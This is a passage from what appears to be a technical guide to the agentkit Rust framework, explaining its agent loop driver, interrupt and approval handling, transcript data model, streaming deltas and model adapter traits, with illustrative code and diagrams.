│   ┌──────────┐   ┌────────────────────┐   │
│   │Transcript│──▶│  Model inference   │   │
│   │          │◀──│  (streaming turn)  │   │
│   └──────────┘   └────────┬───────────┘   │
│        │                  │               │
│        │          ┌───────▼───────┐       │
│        │          │ Tool calls?   │       │
│        │          └───┬───────┬───┘       │
│        │           no │       │ yes       │
│        │              ▼       ▼           │
│        │          [return] [execute]      │
│        │                      │           │
│        └──────────────────────┘           │
│              append results               │
└───────────────────────────────────────────┘

The number of iterations is determined by the model at runtime. The loop may execute zero tool calls (a plain text response) or dozens across multiple turns. This is what distinguishes an agent from a pipeline — the control flow is dynamic.

Loop vs pipeline

In a pipeline, data flows through a fixed sequence of stages. The topology is known at compile time. An agent loop has a dynamic topology: the model decides which tools to call, in what order, and how many times.

This has architectural consequences. A pipeline framework optimises for stage composition and throughput. An agent framework must handle:

  • variable iteration count — the loop runs until the model stops requesting tools
  • interrupt points — the host may need to intervene mid-loop (user cancellation, approval gates, auth challenges)
  • transcript growth — each iteration adds items, eventually requiring compaction
  • parallel execution — independent tool calls within a single turn can run concurrently

The control boundary

The central design question is: where does the framework yield control to the host?

agentkit uses a pull-based model. The host calls driver.next().await and receives one of two outcomes:

#![allow(unused)]
fn main() {
pub enum LoopStep {
    Interrupt(LoopInterrupt),
    Finished(TurnResult),
}
}

Finished means the model completed a turn — the host can inspect the results, submit new input, and call next() again. Interrupt means the loop cannot proceed without host action.

Host                          LoopDriver
 │                               │
 │  submit_input(items)          │
 │──────────────────────────────▶│
 │                               │
 │  next().await                 │
 │──────────────────────────────▶│
 │                               ├── send transcript to model
 │                               ├── stream response
 │                               ├── execute tool calls
 │                               ├── (possibly loop internally)
 │                               │
 │  LoopStep::Finished(result)   │
 │◀──────────────────────────────│
 │                               │
 │  next().await                 │
 │──────────────────────────────▶│
 │                               │
 │  LoopStep::Interrupt(...)     │
 │◀──────────────────────────────│  needs host decision
 │                               │
 │  resolve_approval(...)        │
 │──────────────────────────────▶│  host resolves, loop resumes
 │                               │

There is no polling, no callback registration, and no event queue the host must drain. The next() call is the only synchronisation point.

Interrupts

An interrupt pauses the loop and returns control to the host. agentkit defines three interrupt types:

#![allow(unused)]
fn main() {
pub enum LoopInterrupt {
    ApprovalRequest(PendingApproval),
    AuthRequest(PendingAuth),
    AwaitingInput(InputRequest),
}
}
InterruptTriggerResolution
ApprovalRequestA tool call requires explicit permissionHost calls approve() or deny() on the PendingApproval handle
AuthRequestA tool needs credentials the loop doesn’t haveHost provides credentials or cancels
AwaitingInputThe model finished and the loop has no pending inputHost calls submit_input() with new items

Interrupts are the mechanism for user cancellation and external preemption. A user who wants to abort a loop heading in the wrong direction triggers a cancellation (via CancellationController::interrupt()), which causes the current turn to end with FinishReason::Cancelled. The host sees this in the TurnResult and can decide how to proceed — submit corrected input, adjust the system prompt, or stop entirely.

Non-blocking events

Not everything requires host intervention. Streaming deltas, usage updates, tool lifecycle events, and compaction notifications are delivered to LoopObserver implementations:

#![allow(unused)]
fn main() {
pub trait LoopObserver: Send {
    fn handle_event(&mut self, event: AgentEvent);
}
}

Observers are informational — they cannot stall the loop or alter its control flow. This keeps the driver’s state machine simple: next() either returns a LoopStep or doesn’t return yet. There is no interleaving of observer handling with loop logic.

Blocking (LoopStep)Non-blocking (AgentEvent)
ApprovalRequestContentDelta
AuthRequestToolCallRequested
AwaitingInputUsageUpdated
Finished(TurnResult)CompactionStarted / Finished
TurnStarted / TurnFinished
Warning

The three-layer model

agentkit splits the runtime into three layers:

┌─────────────────────────────────────────────┐
│  Agent                                      │
│  (config: adapter, tools, permissions,      │
│   observers, compaction)                    │
│                                             │
│   ┌─────────────────────────────────────┐   │
│   │  LoopDriver                         │   │
│   │  (mutable state: transcript,        │   │
│   │   pending input, interrupt state)   │   │
│   │                                     │   │
│   │   ┌─────────────────────────────┐   │   │
│   │   │  ModelSession               │   │   │
│   │   │  (provider connection,      │   │   │
│   │   │   turn management)          │   │   │
│   │   └─────────────────────────────┘   │   │
│   └─────────────────────────────────────┘   │
└─────────────────────────────────────────────┘
  • Agent — immutable configuration assembled via a builder. Holds the model adapter, tool registry, permission checker, observers, and compaction config. Can start multiple sessions.
  • LoopDriver<S> — the mutable runtime for a single session. Owns the transcript, manages pending input, tracks interrupt state, and drives the turn loop. Generic over the session type S.
  • ModelSession — the provider-owned session handle. Created by the adapter, consumed by the driver. Each turn calls begin_turn() which returns a streaming ModelTurn.

This separation means: configure once, run many sessions. Or run multiple concurrent sessions from the same Agent, each with its own LoopDriver and independent transcript.

A minimal example

The openrouter-chat example demonstrates the simplest possible host loop. The key parts:

Setup — build an Agent with just a model adapter, start a session:

#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)
    .cancellation(cancellation.handle())
    .build()?;

let mut driver = agent
    .start(SessionConfig {
        session_id: SessionId::new("openrouter-chat"),
        metadata: MetadataMap::new(),
        cache: Some(PromptCacheRequest {
            mode: PromptCacheMode::BestEffort,
            strategy: PromptCacheStrategy::Automatic,
            retention: Some(PromptCacheRetention::Short),
            key: None,
        }),
    })
    .await?;
}

The cache field configures prompt caching for the session. It is optional, but most long-running agents benefit from setting it. See Chapter 15 for the full cache request shape.

Submit input — construct an Item with ItemKind::User and a TextPart:

#![allow(unused)]
fn main() {
driver.submit_input(vec![Item {
    id: None,
    kind: ItemKind::User,
    parts: vec![Part::Text(TextPart {
        text: prompt.into(),
        metadata: MetadataMap::new(),
    })],
    metadata: MetadataMap::new(),
}])?;
}

Drive the loop — call next().await and match on the result:

#![allow(unused)]
fn main() {
match driver.next().await? {
    LoopStep::Finished(result) => {
        // Render assistant items from result.items
    }
    LoopStep::Interrupt(LoopInterrupt::AwaitingInput(_)) => {
        // Model finished, prompt user for more input
    }
    LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
        // A tool needs permission — approve or deny
    }
    LoopStep::Interrupt(LoopInterrupt::AuthRequest(request)) => {
        // A tool needs credentials
    }
}
}

This is the entire host-side contract. The loop handles streaming, tool execution, transcript accumulation, and compaction internally. The host only sees LoopStep values — either results to render or interrupts to resolve.

No tools are registered in this example, so the model cannot make tool calls and the loop always returns Finished after a single inference turn. Adding tools is covered in Chapter 9.

What comes next

The following chapters build up each piece of this system:

  • Chapter 3 defines the data model — the Item and Part types that make up the transcript
  • Chapter 4 covers how streaming works and how deltas fold into durable parts
  • Chapter 5 defines the boundary between the loop and model providers
  • Chapter 6 walks through the driver implementation
  • Chapter 7 covers the interrupt system in detail

The transcript model

The transcript is the agent’s memory of a conversation. Every message, tool call, tool result, and piece of context is represented as an Item in a Vec<Item>. The model sees the transcript on every turn. The loop appends to it. Compaction trims it.

This chapter covers agentkit-core: the foundational data types that every other crate depends on.

The transcript as a data structure

A transcript is a flat vector of items. Each item has a role and carries content:

Vec<Item>
├── Item { kind: System,     parts: [Text("You are a coding assistant.")] }
├── Item { kind: Context,    parts: [Text("Project uses Rust 2024 edition...")] }
├── Item { kind: User,       parts: [Text("Read src/main.rs")] }
├── Item { kind: Assistant,  parts: [Text("I'll read that file."),
│                                    ToolCall { name: "fs.read_file", ... }] }
├── Item { kind: Tool,       parts: [ToolResult { output: "fn main() {...}", ... }] }
└── Item { kind: Assistant,  parts: [Text("The file contains...")] }

This is the complete state that the model receives on every turn. The loop does not maintain hidden side channels or out-of-band context — if something affects the model’s behaviour, it’s in the transcript.

Items and roles

An Item is the basic unit of the transcript:

#![allow(unused)]
fn main() {
pub struct Item {
    pub id: Option<MessageId>,
    pub kind: ItemKind,
    pub parts: Vec<Part>,
    pub metadata: MetadataMap,
}
}

The kind field determines the item’s role:

#![allow(unused)]
fn main() {
pub enum ItemKind {
    System,      // Application-level instructions
    Developer,   // Developer-level instructions
    User,        // End-user messages
    Assistant,   // Model-generated responses
    Tool,        // Tool execution results
    Context,     // Loaded project context (AGENTS.md, skills, etc.)
}
}

The variants are ordered: System < Developer < User < Assistant < Tool < Context. This ordering is used by compaction strategies that need to sort or prioritise items by role.

Role mapping to provider wire formats:

agentkit ItemKindOpenAI roleWhat it carries
System"system"Hardcoded application instructions
Developer"system"Developer-level instructions
User"user"End-user messages
Assistant"assistant"Model-generated text + tool calls
Tool"tool"Tool execution results
Context"system"Project context (AGENTS.md, etc.)

System, Developer, and Context all map to "system" in the OpenAI wire format, but they carry different semantic intent. The distinction matters for compaction: system items are never trimmed, context items may be refreshed, and developer items sit between the two. Collapsing them into a single kind would lose information that compaction strategies need.

Why item-based, not message-based

Older chat APIs model conversations as a flat list of messages with a role field. agentkit uses “items” with “parts” instead, because modern models work with content blocks — a single assistant response may contain text, a tool call, reasoning output, and structured data. Flattening these into separate messages loses structure that the model, compaction strategies, and reporters all need.

Flat message model (what you'd get with role + string):

  { role: "assistant", content: "I'll read main.rs" }
  { role: "assistant", content: null, tool_calls: [...] }

  Two "messages" for one logical response.
  Which one do you compact? How do you correlate them?


Item + parts model (agentkit):

  Item {
      kind: Assistant,
      parts: [
          Text("I'll read main.rs"),
          ToolCall { name: "fs.read_file", input: { "path": "src/main.rs" } },
      ]
  }

  One item. All parts belong to the same response.
  Compaction, reporting, and persistence all see one unit.

Content parts

Each item contains one or more Part values:

#![allow(unused)]
fn main() {
pub enum Part {
    Text(TextPart),
    Media(MediaPart),
    File(FilePart),
    Structured(StructuredPart),
    Reasoning(ReasoningPart),
    ToolCall(ToolCallPart),
    ToolResult(ToolResultPart),
    Custom(CustomPart),
}
}

The part types cover the full range of content that flows through an agent:

Part variantPrimary useExample
TextUser messages, assistant replies"Hello, world!"
MediaImages, audio, videoA PNG screenshot
FileFile attachmentsreport.csv
StructuredJSON output, function returns{ "status": "ok" }
ReasoningChain-of-thought, thinking blocksModel’s internal reasoning
ToolCallModel requests a tool invocationfs.read_file("src/main.rs")
ToolResultTool execution output"fn main() { ... }"
CustomProvider-specific extensionsRaw provider-specific content

Design decision: comprehensive multimodal from day one

agentkit ships with first-class support for text, audio, image, video, files, structured output, and reasoning blocks. The Custom variant exists as an escape hatch for provider-specific content, but the goal is that Custom should be rare — common modalities should map to named variants.

This matters because a text-only provider, a voice-only provider, and a multimodal provider all map naturally into the same Item { parts: Vec<Part> } structure. Complexity grows linearly with modalities, not combinatorially with provider combinations.

Part type details

TextPart is the simplest and most common:

#![allow(unused)]
fn main() {
pub struct TextPart {
    pub text: String,
    pub metadata: MetadataMap,
}
}

MediaPart handles binary content through a modality discriminant and a data reference:

#![allow(unused)]
fn main() {
pub struct MediaPart {
    pub modality: Modality,    // Audio, Image, Video, Binary
    pub mime_type: String,     // e.g. "image/png", "audio/wav"
    pub data: DataRef,
    pub metadata: MetadataMap,
}
}

ReasoningPart captures model chain-of-thought output, which some providers expose alongside the final answer:

#![allow(unused)]
fn main() {
pub struct ReasoningPart {
    pub summary: Option<String>,   // Human-readable reasoning
    pub data: Option<DataRef>,     // Opaque reasoning data
    pub redacted: bool,            // Provider filtered the content
    pub metadata: MetadataMap,
}
}

The redacted flag is important: some providers expose reasoning in debug mode but redact it in production. The transcript records that reasoning happened even when the content is withheld.

StructuredPart carries validated JSON output:

#![allow(unused)]
fn main() {
pub struct StructuredPart {
    pub value: Value,
    pub schema: Option<Value>,     // JSON Schema the value conforms to
    pub metadata: MetadataMap,
}
}

The DataRef abstraction

Media, files, and other binary content don’t carry their bytes inline by default. Instead, they reference data through DataRef:

#![allow(unused)]
fn main() {
pub enum DataRef {
    InlineText(String),    // UTF-8 text (e.g. base64-encoded image)
    InlineBytes(Vec<u8>),  // Raw bytes
    Uri(String),           // External URL
    Handle(ArtifactId),    // Reference to an artifact store
}
}

This is a storage-agnostic pointer. The same MediaPart can reference an image as a base64 string (for small images going directly to the model), a URL (for provider-hosted content), or an artifact handle (for content managed by the host application).

DataRef variants and when to use them:

InlineText ─── small payloads already base64-encoded
                (provider APIs often accept images this way)

InlineBytes ── small payloads in raw binary form
                (useful for local processing before encoding)

Uri ────────── content hosted externally
                (the provider fetches it, or the adapter does)

Handle ─────── content in a host-managed artifact store
                (transcript stays lightweight, data lives elsewhere)

This lets the transcript stay lightweight while supporting large payloads through external storage. A conversation with many image screenshots doesn’t bloat the transcript if the images are stored as Handle references.

Tool call and result types

Tool interaction is modeled as content parts, not side channels:

#![allow(unused)]
fn main() {
pub struct ToolCallPart {
    pub id: ToolCallId,
    pub name: String,
    pub input: serde_json::Value,
    pub metadata: MetadataMap,
}

pub struct ToolResultPart {
    pub call_id: ToolCallId,
    pub output: ToolOutput,
    pub is_error: bool,
    pub metadata: MetadataMap,
}
}

The call_id on ToolResultPart references the id on ToolCallPart. This correlation is how the model matches results back to the requests it made.

Correlation between tool calls and results:

  Item { kind: Assistant, parts: [
      ToolCall { id: "call-1", name: "fs.read_file", input: {...} },
      ToolCall { id: "call-2", name: "shell.exec",   input: {...} },
  ]}
       │                                │
       │ call_id: "call-1"              │ call_id: "call-2"
       ▼                                ▼
  Item { kind: Tool, parts: [
      ToolResult { call_id: "call-1", output: "fn main()...", is_error: false },
      ToolResult { call_id: "call-2", output: "error: ...",   is_error: true  },
  ]}

When the model requests multiple tool calls in a single response, the assistant item contains multiple ToolCallParts, and the corresponding tool item contains multiple ToolResultParts. The id/call_id pairs maintain the mapping.

ToolOutput preserves rich structure:

#![allow(unused)]
fn main() {
pub enum ToolOutput {
    Text(String),
    Structured(Value),
    Parts(Vec<Part>),
    Files(Vec<FilePart>),
}
}

Tools don’t have to collapse their output to a plain string. A tool that reads a file returns Text. A tool that queries a database returns Structured. A tool that captures a screenshot returns Parts containing a MediaPart. The loop and provider adapter decide how to serialize the output when building the next model request.

Typed identifiers

agentkit uses newtype wrappers for all identifiers:

#![allow(unused)]
fn main() {
pub struct SessionId(pub String);
pub struct TurnId(pub String);
pub struct MessageId(pub String);
pub struct ToolCallId(pub String);
pub struct TaskId(pub String);
pub struct ApprovalId(pub String);
pub struct ProviderMessageId(pub String);
pub struct ArtifactId(pub String);
pub struct PartId(pub String);
}

All generated by the same id_newtype! macro, which derives Clone, Debug, Serialize, Deserialize, Display, Hash, Eq, Ord, and conversions from &str and String.

This prevents accidental mix-ups — passing a ToolCallId where a TaskId is expected is a compile error, not a runtime bug. The cost is some verbosity when constructing IDs (SessionId::new("my-session") instead of "my-session"), but the safety benefit compounds across a codebase where dozens of string IDs flow through multiple layers.

Without newtypes:

  fn execute(call_id: String, task_id: String, session_id: String) { ... }
  execute(session_id, call_id, task_id);  // compiles, wrong at runtime

With newtypes:

  fn execute(call_id: ToolCallId, task_id: TaskId, session_id: SessionId) { ... }
  execute(session_id, call_id, task_id);  // compile error

The metadata bag

Every significant type carries a MetadataMap:

#![allow(unused)]
fn main() {
pub type MetadataMap = BTreeMap<String, serde_json::Value>;
}

This is the extension point. Provider-specific data (like an OpenAI logprobs field or an OpenRouter cost value) lives in namespaced metadata keys rather than polluting the core schema. The convention is provider_name.field_name:

Metadata keySourceExample value
openrouter.modelOpenRouter adapter"anthropic/claude-3.5-sonnet"
openrouter.refusalOpenRouter adapter"I cannot help with that"
agentkit.interruptedLoop drivertrue
agentkit.interrupt_reasonLoop driver"user_cancelled"

BTreeMap is used instead of HashMap for deterministic serialization order — metadata roundtrips through JSON identically regardless of insertion order. This matters for snapshot testing and transcript persistence.

The rest of the stack never depends on metadata for correctness. It’s there for observability, debugging, and host-specific extensions.

Usage and finish reasons

Token counts and costs are first-class:

#![allow(unused)]
fn main() {
pub struct Usage {
    pub tokens: Option<TokenUsage>,
    pub cost: Option<CostUsage>,
    pub metadata: MetadataMap,
}

pub struct TokenUsage {
    pub input_tokens: u64,
    pub output_tokens: u64,
    pub reasoning_tokens: Option<u64>,
    pub cached_input_tokens: Option<u64>,
    pub cache_write_input_tokens: Option<u64>,
}

pub struct CostUsage {
    pub amount: f64,
    pub currency: String, // ISO 4217, e.g. "USD"
    pub provider_amount: Option<String>,
}
}

Not all providers report all fields. TokenUsage uses Option for fields that only some providers support (reasoning tokens, cached input tokens, cache write tokens). The Usage struct itself wraps both token and cost in Option because some providers report one without the other.

Finish reasons are normalized to a small, stable enum:

#![allow(unused)]
fn main() {
pub enum FinishReason {
    Completed,   // Normal completion
    ToolCall,    // Stopped to invoke tools
    MaxTokens,   // Hit the token limit
    Cancelled,   // User-initiated cancellation
    Blocked,     // Content policy violation
    Error,       // Generation error
    Other(String),
}
}

The loop inspects FinishReason to decide what to do next:

FinishReasonLoop behaviour
CompletedReturn TurnResult to the host
ToolCallExecute tools, start another model turn
MaxTokensReturn TurnResult (host may submit more input)
CancelledReturn TurnResult with cancellation metadata
BlockedReturn TurnResult (host may adjust the prompt)
ErrorReturn error to the host
Other(s)Treat as Completed (log the unknown reason)

Providers map their native stop reasons into this enum. The original value can be preserved in metadata if needed.

Cancellation primitives

agentkit supports cooperative turn cancellation through a generation-counter pattern:

#![allow(unused)]
fn main() {
pub struct CancellationController { /* Arc<AtomicU64> */ }
pub struct CancellationHandle { /* Arc<AtomicU64> */ }
pub struct TurnCancellation { handle: CancellationHandle, generation: u64 }
}

The three types form a publish-subscribe pattern:

CancellationController              CancellationHandle
(owned by the host)                 (shared with loop + tools)
        │                                   │
        │  interrupt()                      │  checkpoint()
        │  ─────────▶ bumps AtomicU64       │  ────────────▶ TurnCancellation
        │             (generation: 0→1)     │                 { generation: 0 }
        │                                   │
        │                                   │  After interrupt():
        │                                   │  checkpoint.is_cancelled() → true
        │                                   │  (because 0 ≠ 1)

The controller increments a counter. Any TurnCancellation checkpoint created before the increment reports itself as cancelled. This is lightweight (one AtomicU64), lock-free, and works in tokio::select! to race a model call against user interruption:

#![allow(unused)]
fn main() {
tokio::select! {
    result = model_turn.next_event(None) => { /* process event */ }
    _ = cancellation.cancelled() => { /* turn was cancelled */ }
}
}

The cancelled() method polls every 10ms — fast enough for responsive cancellation, cheap enough to run alongside every model call.

The ItemView trait

For downstream crates that need to operate on item-like types without depending on the concrete Item struct, agentkit defines a read-only view trait:

#![allow(unused)]
fn main() {
pub trait ItemView {
    fn kind(&self) -> ItemKind;
    fn parts(&self) -> &[Part];
    fn metadata(&self) -> &MetadataMap;
}
}

Item implements ItemView. Compaction strategies and reporters can accept &dyn ItemView if they need to work with projected or wrapped item types.

Design principles

Three principles guide the core data model:

  1. Normalize what the rest of the stack must reason about. If the loop, tools, compaction, and reporting all need to understand something, it gets a first-class type in core. This is why FinishReason has explicit variants for ToolCall and Cancelled rather than encoding them as metadata — the loop’s branching logic depends on them.

  2. Don’t force provider wire formats into the public API. Providers keep their native types internally. They project into core types at the boundary. A provider that uses "stop" for Completed and "end_turn" for ToolCall handles the mapping in its adapter — the loop never sees provider-native strings.

  3. Preserve provider-specific data without polluting the model. A small number of first-class fields (parts, usage, finish reason) plus an open-ended MetadataMap on every type. The first-class fields cover what the framework must understand; metadata covers what specific integrations care about.

Error types

agentkit-core defines three error types used across the workspace:

  • NormalizeError — content cannot be projected into the agentkit data model (e.g. an unsupported media type)
  • ProtocolError — the provider or loop reached an invalid state (e.g. a tool result without a matching call)
  • AgentError — unifies both via From impls, used as the top-level error type

These are intentionally minimal. Each downstream crate defines its own error types (like LoopError, ToolError, CompactionError) that wrap or convert from these when needed.

Crate: agentkit-core — this entire chapter describes types defined in this single crate. It has no runtime dependencies and no async code. Every other crate in the workspace depends on it.

Streaming and deltas

Models generate tokens incrementally. A production agent must handle this streaming output — rendering text to the user as it arrives, accumulating tool call arguments chunk by chunk, and folding everything into durable transcript items when the turn completes.

This chapter covers the Delta type and the streaming protocol.

The problem with streaming

Streaming creates a fundamental tension: the transcript stores complete Part values, but the model emits fragments. You need a way to bridge these two representations without requiring every downstream consumer (reporters, compaction, persistence) to understand the streaming protocol.

What the provider sends (SSE stream):

  data: {"delta":{"content":"The"}}
  data: {"delta":{"content":" answer"}}
  data: {"delta":{"content":" is"}}
  data: {"delta":{"content":" 42."}}
  data: [DONE]

What the transcript stores (after the turn):

  Item {
      kind: Assistant,
      parts: [Part::Text(TextPart { text: "The answer is 42." })]
  }

Everything between those two representations is the streaming layer’s job.

agentkit’s solution is to separate the two concerns entirely:

  • Delta — transient, incremental, consumed during a turn
  • Part — durable, complete, stored in the transcript after a turn

The loop folds deltas into parts. Reporters observe deltas for real-time rendering. The transcript only ever contains committed parts.

Provider SSE stream
        │
        ▼
   ┌──────────┐
   │  Adapter  │  converts SSE chunks → Delta values
   └────┬─────┘
        │
        ▼
   Delta stream (transient, intra-turn)
   ┌──────────────────────────────────────────────┐
   │ BeginPart → AppendText → AppendText → Commit │
   └─────┬──────────────┬────────────────────┬────┘
         │              │                    │
         ▼              ▼                    ▼
    LoopObserver    LoopObserver        LoopDriver
    (reporter)     (usage tracker)     (folds → Part)
                                             │
                                             ▼
                                     Transcript (durable)
                                     Vec<Item> with committed Parts

The delta protocol

#![allow(unused)]
fn main() {
pub enum Delta {
    BeginPart { part_id: PartId, kind: PartKind },
    AppendText { part_id: PartId, chunk: String },
    AppendBytes { part_id: PartId, chunk: Vec<u8> },
    ReplaceStructured { part_id: PartId, value: Value },
    SetMetadata { part_id: PartId, metadata: MetadataMap },
    CommitPart { part: Part },
}
}

Each variant serves a specific role in the streaming lifecycle:

Delta variantWhen it’s emittedWhat the consumer does
BeginPartModel starts generating a new content blockAllocate a buffer for part_id
AppendTextA text chunk arrives (token or group of tokens)Append to the text buffer
AppendBytesA binary chunk arrives (audio, image data)Append to the byte buffer
ReplaceStructuredA structured value is updated wholesaleReplace the buffer contents
SetMetadataMetadata for a part is availableStore metadata for the part
CommitPartThe part is completeFinalise, discard the buffer

A text streaming sequence

The most common case — the model generates a text response:

Adapter emits:                                       Reporter sees:     Buffer state:

1. BeginPart { id: "p1", kind: Text }                (allocate)         ""
2. AppendText { id: "p1", chunk: "The " }            print("The ")      "The "
3. AppendText { id: "p1", chunk: "answer" }          print("answer")    "The answer"
4. AppendText { id: "p1", chunk: " is " }            print(" is ")      "The answer is "
5. AppendText { id: "p1", chunk: "42." }             print("42.")       "The answer is 42."
6. CommitPart { part: Text("The answer is 42.") }    (done)             → transcript

The reporter prints each chunk as it arrives — the user sees text appear incrementally. The driver accumulates the same chunks but only commits the final Part to the transcript.

A multi-part streaming sequence

An assistant response with both text and a tool call:

1. BeginPart { id: "p1", kind: Text }
2. AppendText { id: "p1", chunk: "I'll read that file." }
3. CommitPart { part: Text("I'll read that file.") }
4. BeginPart { id: "p2", kind: ToolCall }
5. AppendText { id: "p2", chunk: "{\"path\":" }          ← JSON argument streaming
6. AppendText { id: "p2", chunk: " \"src/main.rs\"}" }
7. CommitPart { part: ToolCall { name: "fs.read_file", input: {...} } }

Note that part_id distinguishes concurrent parts. The protocol supports interleaved deltas for different parts, though most providers emit parts sequentially.

Why not mirror Part variants in Delta?

A simpler design would be one delta variant per part type (TextDelta, MediaDelta, etc.). agentkit uses generic operations instead (AppendText, AppendBytes, ReplaceStructured) because:

  • Multiple part types use text appending (text, reasoning, tool call arguments)
  • Multiple part types use byte appending (audio, image, video)
  • The operations describe what’s happening during streaming, not what the final type will be
  • Adding a new part type doesn’t require a new delta variant unless it has genuinely novel streaming behavior
Delta operations vs Part types — the many-to-many relationship:

AppendText ────── Text          (user/assistant text)
           ├──── Reasoning      (chain-of-thought output)
           └──── ToolCall       (JSON arguments as text)

AppendBytes ───── Media(Audio)  (audio stream)
            ├──── Media(Image)  (image data)
            └──── Media(Video)  (video frames)

ReplaceStructured ─── Structured (JSON output, replaced wholesale)

Tool call streaming

Tool calls stream differently from text. The model emits the tool name upfront (usually in a non-streaming fashion) and then streams the JSON arguments incrementally:

SSE from provider:

  data: {"delta":{"tool_calls":[{"index":0,"id":"call-7","function":{"name":"fs.read_file"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"{\"pa"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"th\":"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":" \"sr"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"c/mai"}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"n.rs\""}}]}}
  data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"}"}}]}}

What the adapter emits:

  BeginPart { id: "tc0", kind: ToolCall }
  AppendText { id: "tc0", chunk: "{\"pa" }
  AppendText { id: "tc0", chunk: "th\": " }
  AppendText { id: "tc0", chunk: "\"src/mai" }
  AppendText { id: "tc0", chunk: "n.rs\"}" }
  CommitPart { part: ToolCall { id: "call-7", name: "fs.read_file", input: {"path":"src/main.rs"} } }

The loop waits for CommitPart before executing the tool. Partial JSON arguments are not actionable — {"pa is not a valid tool input. This is why tool calls use the same AppendText mechanism as regular text but the driver only acts on the committed ToolCallPart.

Parallel tool call streaming

When the model requests multiple tool calls in a single response, the SSE stream interleaves them by index:

data: {"delta":{"tool_calls":[{"index":0,"id":"call-1","function":{"name":"fs.read_file"}}]}}
data: {"delta":{"tool_calls":[{"index":1,"id":"call-2","function":{"name":"shell.exec"}}]}}
data: {"delta":{"tool_calls":[{"index":0,"function":{"arguments":"{\"path\":"}}]}}
data: {"delta":{"tool_calls":[{"index":1,"function":{"arguments":"{\"exec"}}]}}
...

The adapter maintains per-index accumulators and emits separate BeginPart/AppendText/CommitPart sequences for each tool call. The part_id field keeps them distinct.

Reasoning block streaming

Models that expose chain-of-thought (like Claude with extended thinking) stream reasoning blocks before the final answer:

1. BeginPart { id: "r1", kind: Reasoning }
2. AppendText { id: "r1", chunk: "The user wants to know..." }
3. AppendText { id: "r1", chunk: " I should consider..." }
4. CommitPart { part: Reasoning { summary: Some("The user wants..."), ... } }
5. BeginPart { id: "p1", kind: Text }
6. AppendText { id: "p1", chunk: "The answer is 42." }
7. CommitPart { part: Text("The answer is 42.") }

A reporter can display reasoning blocks differently (dimmed, collapsible, in a side panel), while the transcript stores them as ordinary parts that compaction can later drop to save space.

Observer consumption

Reporters observe deltas via the LoopObserver trait:

#![allow(unused)]
fn main() {
pub trait LoopObserver: Send {
    fn handle_event(&mut self, event: AgentEvent);
}
}

When the driver receives a Delta from the model turn, it wraps it as AgentEvent::ContentDelta(delta) and dispatches it to all registered observers synchronously, in registration order.

This is how real-time text rendering works — the StdoutReporter receives AppendText deltas and writes each chunk to the terminal immediately:

#![allow(unused)]
fn main() {
fn handle_event(&mut self, event: AgentEvent) {
    if let AgentEvent::ContentDelta(Delta::AppendText { chunk, .. }) = &event {
        print!("{}", chunk);
        std::io::stdout().flush().ok();
    }
}
}

The ordering guarantee matters: within a single driver instance, deltas are delivered to observers in the order the adapter produces them. If the adapter emits AppendText("Hello") before AppendText(", world"), every observer sees them in that order. This is trivially satisfied because observers are called synchronously on the driver’s task — there is no async fan-out or buffering between the adapter and observers.

What observers should and shouldn’t do

Observers are called inline on the driver’s task. They must be fast — a slow observer blocks the entire loop. Guidelines:

  • Do: write to stderr/stdout, increment counters, append to a Vec
  • Do: send to a channel for async processing elsewhere
  • Don’t: make HTTP requests, write to databases, or do anything that might block
  • Don’t: modify the transcript or influence the loop’s control flow

If you need expensive processing, use a ChannelReporter adapter that forwards events to another task.

Relationship to the transcript

After a turn completes, the transcript contains only committed Part values inside Items. Deltas are discarded. On the next turn, the model receives the transcript — not the deltas that produced it.

During a turn:                        After a turn:

  Delta stream (live)                  Transcript (durable)
  ┌────────────────────┐               ┌─────────────────────────┐
  │ BeginPart          │               │ Item { kind: Assistant, │
  │ AppendText("He")   │               │   parts: [              │
  │ AppendText("llo")  │    fold ──▶   │     Text("Hello"),      │
  │ CommitPart(Text)   │               │     ToolCall { ... },   │
  │ BeginPart          │               │   ]                     │
  │ AppendText("{...") │               │ }                       │
  │ CommitPart(Tool)   │               └─────────────────────────┘
  └────────────────────┘
       (discarded)                          (persisted)

This separation means:

  • Compaction operates on stable, complete items — it never sees partial deltas
  • Persistence stores items, not delta streams — simpler storage format
  • The streaming protocol can evolve independently of the transcript format — adding a new delta variant doesn’t change how transcripts are stored
  • Replay is possible without streaming — a transcript can be loaded from storage and fed directly to the model without reconstructing the delta sequence

Crate: Delta, PartId, and PartKind are defined in agentkit-core. The folding logic lives in agentkit-loop. Reporters that consume deltas are in agentkit-reporting.

The model adapter boundary

Chapter 1 showed how to build adapters from the outside in — implementing them for specific providers. This chapter looks from the inside out: how the loop consumes the adapter traits, what guarantees it relies on, and what happens when those guarantees are violated.

The adapter boundary is the narrowest point in the architecture. Everything above it (loop logic, tool execution, compaction) is provider-agnostic. Everything below it (HTTP clients, SSE parsing, auth headers) is provider-specific. The three traits define the contract between these two worlds.

Three-level trait hierarchy

#![allow(unused)]
fn main() {
#[async_trait]
pub trait ModelAdapter: Send + Sync {
    type Session: ModelSession;
    async fn start_session(&self, config: SessionConfig) -> Result<Self::Session, LoopError>;
}

#[async_trait]
pub trait ModelSession: Send {
    type Turn: ModelTurn;
    async fn begin_turn(
        &mut self,
        request: TurnRequest,
        cancellation: Option<TurnCancellation>,
    ) -> Result<Self::Turn, LoopError>;
}

#[async_trait]
pub trait ModelTurn: Send {
    async fn next_event(
        &mut self,
        cancellation: Option<TurnCancellation>,
    ) -> Result<Option<ModelTurnEvent>, LoopError>;
}
}

The Send + Sync bound on ModelAdapter means adapters can be shared across threads — an Agent can be cloned or wrapped in an Arc and used from multiple tasks. ModelSession is only Send, not Sync — sessions are single-owner and move between tasks but are not accessed concurrently. ModelTurn is likewise Send only.

Why three levels?

The decomposition maps to three distinct lifetimes in a provider interaction:

LifetimeTraitState it holds
ApplicationModelAdapterAPI key, base URL, HTTP client, model name (immutable, shared)
SessionModelSessionConversation ID, WebSocket connection, session token (mutable)
TurnModelTurnSSE stream, response buffer, chunk parser (mutable, consumed once)

This supports both stateless and stateful providers:

